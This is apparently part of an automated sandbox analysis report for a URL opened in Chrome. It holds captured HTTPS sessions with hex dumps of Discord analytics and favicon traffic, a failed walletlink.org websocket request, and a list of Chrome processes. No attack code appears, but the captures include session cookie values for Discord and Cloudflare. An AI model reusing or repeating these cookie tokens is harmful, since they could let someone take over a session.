                                                                          2023-12-10 16:45:27 UTC492OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 69 6d 70 72 65 73 73 69 6f 6e 5f 75 73 65 72 5f 72 65 67 69 73 74 72 61 74 69 6f 6e 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 32 32 32 36 37 32 34 36 38 38 2c 22 69 6d 70 72 65 73 73 69 6f 6e 5f 74 79 70 65 22 3a 22 76 69 65 77 22 2c 22 69 6d 70 72 65 73 73 69 6f 6e 5f 67 72 6f 75 70 22 3a 22 75 73 65 72 5f 72 65 67 69 73 74 72 61 74 69 6f 6e 5f 66 6c 6f 77 22 2c 22 73 74 65 70 22 3a 22 69 6e 76 69 74 65 22 2c 22 6c 6f 63 61 74 69 6f 6e 5f 73 65 63 74 69 6f 6e 22 3a 22 69 6d 70 72 65 73 73 69 6f 6e 5f 75 73 65 72 5f 72 65 67 69 73 74 72 61 74 69 6f 6e 22 2c 22 63 6c 69 65 6e 74 5f 70 65 72 66 6f 72 6d 61 6e
                                                                          Data Ascii: {"events":[{"type":"impression_user_registration","properties":{"client_track_timestamp":1702226724688,"impression_type":"view","impression_group":"user_registration_flow","step":"invite","location_section":"impression_user_registration","client_performan
                                                                          2023-12-10 16:45:28 UTC972INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 76 61 72 79 3a 20 4f 72 69 67 69 6e 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a
                                                                          Data Ascii: HTTP/1.1 204 No ContentDate: Sun, 10 Dec 2023 16:45:28 GMTConnection: closeaccess-control-allow-origin: https://discord.comvary: Origin, Access-Control-Request-Method, Access-Control-Request-HeadersVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          396192.168.2.550135162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:28 UTC777OUTGET /assets/images/favicon.ico HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=Klx2KpzlAPzS0XUsz_mspbA54eHe58ixl3lHU.V9O5g-1702226727486-0-604800000
                                                                          2023-12-10 16:45:28 UTC1126INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 34 35 36 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 35 62 39 62 30 65 64 61 63 39 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:28 GMTContent-Type: image/vnd.microsoft.iconContent-Length: 24565Connection: closeCF-Ray: 8336f55b9b0edac9-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.
                                                                          2023-12-10 16:45:28 UTC243INData Raw: 00 00 01 00 04 00 10 10 00 00 01 00 20 00 68 04 00 00 46 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 ae 04 00 00 30 30 00 00 01 00 20 00 a8 25 00 00 56 15 00 00 00 00 00 00 01 00 20 00 f7 24 00 00 fe 3a 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 58 32 f1 64 58 98 f1 64 57 da f1 64 57 fa f1 64 58 fa f1 64 58 da f1 64 58 98 f1 64 58 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 57 0a f1 64 57 9a f1 64 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f1 64 57 9a f1 64 57 0a 00 00 00 00 00 00 00 00 00 00 00 00 f1
                                                                          Data Ascii: hF 00 %V $:( dX2dXdWdWdXdXdXdX2dWdWdXeXeXeXeXeXeXdWdWdW
                                                                          2023-12-10 16:45:28 UTC1369INData Raw: 64 57 0a f1 64 58 c2 f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 65 58 c2 f1 65 57 0a 00 00 00 00 00 00 00 00 f1 64 57 9a f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 65 57 9a 00 00 00 00 f1 64 58 32 f1 64 57 ff f2 65 58 ff f2 65 58 ff f4 7c 71 ff f7 aa a3 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f7 aa a3 ff f3 7c 71 ff f2 65 58 ff f2 65 58 ff f1 65 58 ff f1 65 58 32 f1 64 57 98 f2 65 58 ff f2 65 58 ff f8 b2 ab ff fe fd fd ff fd e8 e6 ff f9 c1 bb ff fb d6 d3 ff fb d6 d3 ff f9 c1 bb ff fd e8 e6 ff fe fd fd ff f8 b2 ab ff f2 65 58 ff f2 65 58 ff f1 65 57 98 f1 64 57 da
                                                                          Data Ascii: dWdXeXeXeXeXeXeXeXeXeXeXeXeWdWeXeXeXeXeXeXeXeXeXeXeXeXeWdX2dWeXeX|qeXeXeXeX|qeXeXeXeX2dWeXeXeXeXeWdW
                                                                          2023-12-10 16:45:28 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 57 26 f1 64 57 d4 f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 57 d4 f1 64 57 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 58 32 f1 65 58 ec f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 57 ec f1 65 58 32 00 00 00 00 00
                                                                          Data Ascii: dW&dWeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXdWdW&dX2eXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXdWeX2
                                                                          2023-12-10 16:45:28 UTC1369INData Raw: ff fd ee ed ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f9 bf b9 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 57 ce f1 64 57 ec f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f8 b4 ad ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f5 8d 84 ff f2 65 58 ff f2 65 58 ff fa c7 c2 ff ff ff ff ff ff ff ff ff fa c7 c2 ff f2 65 58 ff f2 65 58 ff f5 8d 83 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f8 b3 ad ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 57 ec f1 64 58 fc f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f6 9f 96 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f3 76 6b ff f2 65 58 ff f2 65 58 ff f8 b0 aa ff ff ff ff ff ff ff ff ff f8 b0 aa ff f2 65 58 ff f2 65
                                                                          Data Ascii: eXeXeXeXeXdWdWeXeXeXeXeXeXeXeXeXeXeXeXeXeXdWdXeXeXeXeXeXvkeXeXeXe
                                                                          2023-12-10 16:45:28 UTC1369INData Raw: f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 65 57 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 58 0a f1 64 58 d4 f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 65 57 d4 f1 65 57 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 65 58 26 f1 65 58 ec f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f2 65 58
                                                                          Data Ascii: eXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeWdXdXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeXeWeWeX&eXeXeXeXeXeX
                                                                          2023-12-10 16:45:28 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 64 58 16 f1 64 57 74 f1 64 58 ce f1 64 58 ff f1 64 58 ff f1 64 57 ff f1 64 58 ff f1 64 58 ff f1 64 57 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ce f1 64 58 74 f1 64 58 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 f1 65 58 1c f1 64 57 94 f1 64 58 f6 f2 65 58 ff f1 65 57 ff f2 65 58 ff f2 65 58 ff f1 65 57 ff f2 65 58 ff f2 65 58 ff
                                                                          Data Ascii: dXdWtdXdXdXdWdXdXdWdXdXdXdXdXdXdXdXdXdXtdXeXdWdXeXeWeXeXeWeXeX
                                                                          2023-12-10 16:45:28 UTC1369INData Raw: 58 ff f1 65 57 ff f2 65 58 ff f2 65 58 ff f1 65 57 ff f2 65 58 ff f2 65 58 ff f1 65 57 ff f2 65 58 ff f2 65 58 ff f1 65 57 ff f2 65 58 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f1 65 57 ff f1 65 57 54 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 02 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 02 f1 64 57 2c f1 64 57 f4 f2 65 57 ff f1 65 58 ff f2 65 58 ff f2 65 57 ff f1 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1
                                                                          Data Ascii: XeWeXeXeWeXeXeWeXeXeWeXeWeWeWeWeWeWeWeWeWeWeWeWeWeWeWeWeWeWeWTdW,dWeWeXeXeWeXeXeXdWeXeXdWeXeXdWeXeXdWeXeXdWeXeX
                                                                          2023-12-10 16:45:28 UTC1369INData Raw: ff f1 64 57 ff f2 66 59 ff f3 77 6c ff f5 89 7f ff f5 92 89 ff f5 92 89 ff f5 89 7f ff f3 77 6c ff f2 66 59 ff f1 64 57 ff f6 98 8f ff fe fd fc ff fe fe fe ff ff ff ff ff ff ff ff ff fe fe fe ff fd ee ed ff f6 9c 94 ff f2 65 58 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 64 57 ff f2 65 58 ff f2 65 58 ff f1 65 57 74 00 00 00 00 ef 60 50 02 f1 64 57 ce f1 64 58 ff f1 64 58 ff f2 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f3 71 66 ff fb d5 d1 ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fa ca c5 ff f4 84 7a ff f7 a2 9b ff fb d1 cd ff fe f4 f3 ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe f4 f3 ff fb d1 cd ff f7 a2 9b ff f4 85 7b ff fa ca c6 ff fe fe fe ff fe fe fe ff fe fe
                                                                          Data Ascii: dWfYwlwlfYdWeXeXeXdWeXeXdWeXeXeWt`PdWdXdXdXdXdXdXdXqfz{
                                                                          2023-12-10 16:45:28 UTC1369INData Raw: fe fe fe ff f4 88 7e ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff fa cc c8 ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff fe fe fe ff f4 80 76 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 ff f1 64 58 f2 f2 65 58 ff f2 65 57 ff f2 65 57 ff f1 65 57 ff f2 65 58 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 6b 5e ff fe fc fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fa cf cb ff f2 65 58 ff f2 65 58 ff f1 65 57 ff f2 65 58 ff f5 8c 82 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f5 8c 83 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff f2 65 57 ff fa cf cb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fe fc fb ff f2 6b 5e ff f2 65 57 ff f2 65 57
                                                                          Data Ascii: ~dXdXdXdXvdXdXdXdXdXdXdXdXdXeXeWeWeWeXeWeWeWeWk^eXeXeWeXeWeWeWeWk^eWeW


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          397192.168.2.550139104.18.37.84435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:31 UTC503OUTGET /rpc HTTP/1.1
                                                                          Host: www.walletlink.org
                                                                          Connection: Upgrade
                                                                          Pragma: no-cache
                                                                          Cache-Control: no-cache
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Upgrade: websocket
                                                                          Origin: https://boringsecurity.com
                                                                          Sec-WebSocket-Version: 13
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Sec-WebSocket-Key: pd5Aru5KqE10vousBFf5Kw==
                                                                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                          2023-12-10 16:45:31 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 2a 0d 0a 53 65 63 2d 57 65 62 73 6f 63 6b 65 74 2d 56 65 72 73 69 6f 6e 3a 20 31 33 0d 0a 58 2d 43 6f 6e 74 65 6e
                                                                          Data Ascii: HTTP/1.1 400 Bad RequestDate: Sun, 10 Dec 2023 16:45:31 GMTContent-Type: text/plain; charset=utf-8Content-Length: 12Connection: closeAccess-Control-Allow-Headers: AuthorizationAccess-Control-Allow-Origin: *Sec-Websocket-Version: 13X-Conten
                                                                          2023-12-10 16:45:31 UTC12INData Raw: 42 61 64 20 52 65 71 75 65 73 74 0a
                                                                          Data Ascii: Bad Request


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:17:44:07
                                                                          Start date:10/12/2023
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:2
                                                                          Start time:17:44:09
                                                                          Start date:10/12/2023
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:17:44:11
                                                                          Start date:10/12/2023
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ctrk.klclick.com/l/01HHA7T34SH51AXCSV6CC50V39_2
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:17:45:19
                                                                          Start date:10/12/2023
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6036 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:8
                                                                          Start time:17:45:19
                                                                          Start date:10/12/2023
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6052 --field-trial-handle=1964,i,2291995251534009458,9676275645718360360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          No disassembly